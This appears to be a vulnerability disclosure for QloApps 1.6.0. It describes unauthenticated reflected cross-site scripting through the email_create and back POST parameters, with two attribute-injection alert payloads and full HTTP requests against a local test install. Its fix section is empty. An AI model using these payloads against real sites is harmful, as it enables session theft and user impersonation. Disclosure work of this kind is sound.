Affected Version: QloApps 1.6.0

Product Link: https://github.com/webkul/hotelcommerce

Security Issue:

(Unauthenticated) - Cross site scripting in POST Request via email_create and back parameter

URL: <http://localhost/hotelcommerce/?rand=1686819876304>
Vulnerable Parameters: email_create, back
Method: POST

Vulnerability Description:

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

Payload:

[email protected]" onmouseover=alert(97116) y=

HTTP Request:


POST /hotelcommerce/?rand=1686819876304 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: <http://localhost/hotelcommerce/>
Cookie: PrestaShop-daf117f818c8eeecfa2bccccdd849a8c=def50200d0700c8e1ce83eb9011c85fc1a7a13fd692fff7978faf0aee28393ec07448da5b897ac23ae436e561d19779c8a03069eec596f38e539ab0000bb2f089ecd83e89ddbfd1e8b31823c085ef8a8677984acefe7a5e50381b9cab6c43f00f64266bbcbbe1aee8cc8973dfeba07d8aac9b4f218b0412ac45296cf1d40c29c2eec7d00246d0364df858ff23c167025a43fc52ff3cec61609bcd6e49669a38484c1c65bab86e14b40b15b029ffc3646914c98791cec8540d37c8ac8b2c82fc4c60b453284624fe151fe83bfb9f6bd145a121d632de4cfd1445e8e383682016b60be23754d309198a2de90353a25a23296b580a3183a277a6c1f646c7f30c2fb1a2b36d718e533f1b3a4e9ee9e3265e5521284ca85459fd49e7474b68b1e916fdfe5d0e52ac0494801a328ba0f345b675521b00d9fa460e07fe31bf34c75eb90380064714a1a3fb6e212d52a94fa52ec796dbb185343bc2688079f9a30440aee2ae26438bea2d0b3fec51915d5ed4af7c249b41857eaf5003b52c1463b37bd034b567360f94eed0bbf96a5d3175f181ac6b9c0bf175884e677429a1faea08c2d7c707fa401837d67ad1168ed6969d87be69e5e74cf98a2c086ffcf9a747b8ef9a9031bf06c
Content-Length: 199
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email=testing%40example.com&[email protected]"%20onmouseover=alert(97116)%20y=&token=28ecd85e412ad49f96012f625496c23e

Payload:

my-account" onmouseover=alert(90406) y=

HTTP Request:

POST /hotelcommerce/?rand=1686819876304 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: <http://localhost/hotelcommerce/>
Cookie: PrestaShop-daf117f818c8eeecfa2bccccdd849a8c=def50200d0700c8e1ce83eb9011c85fc1a7a13fd692fff7978faf0aee28393ec07448da5b897ac23ae436e561d19779c8a03069eec596f38e539ab0000bb2f089ecd83e89ddbfd1e8b31823c085ef8a8677984acefe7a5e50381b9cab6c43f00f64266bbcbbe1aee8cc8973dfeba07d8aac9b4f218b0412ac45296cf1d40c29c2eec7d00246d0364df858ff23c167025a43fc52ff3cec61609bcd6e49669a38484c1c65bab86e14b40b15b029ffc3646914c98791cec8540d37c8ac8b2c82fc4c60b453284624fe151fe83bfb9f6bd145a121d632de4cfd1445e8e383682016b60be23754d309198a2de90353a25a23296b580a3183a277a6c1f646c7f30c2fb1a2b36d718e533f1b3a4e9ee9e3265e5521284ca85459fd49e7474b68b1e916fdfe5d0e52ac0494801a328ba0f345b675521b00d9fa460e07fe31bf34c75eb90380064714a1a3fb6e212d52a94fa52ec796dbb185343bc2688079f9a30440aee2ae26438bea2d0b3fec51915d5ed4af7c249b41857eaf5003b52c1463b37bd034b567360f94eed0bbf96a5d3175f181ac6b9c0bf175884e677429a1faea08c2d7c707fa401837d67ad1168ed6969d87be69e5e74cf98a2c086ffcf9a747b8ef9a9031bf06c
Content-Length: 201
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

SubmitCreate=1&ajax=true&back=my-account"%20onmouseover=alert(90406)%20y=&controller=authentication&email=testing%40example.com&email_create=testing%40example.com&token=28ecd85e412ad49f96012f625496c23e

Screenshot:

postxss1.PNG

postxss2.PNG

The impact of this vulnerability:

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

How to fix this vulnerability: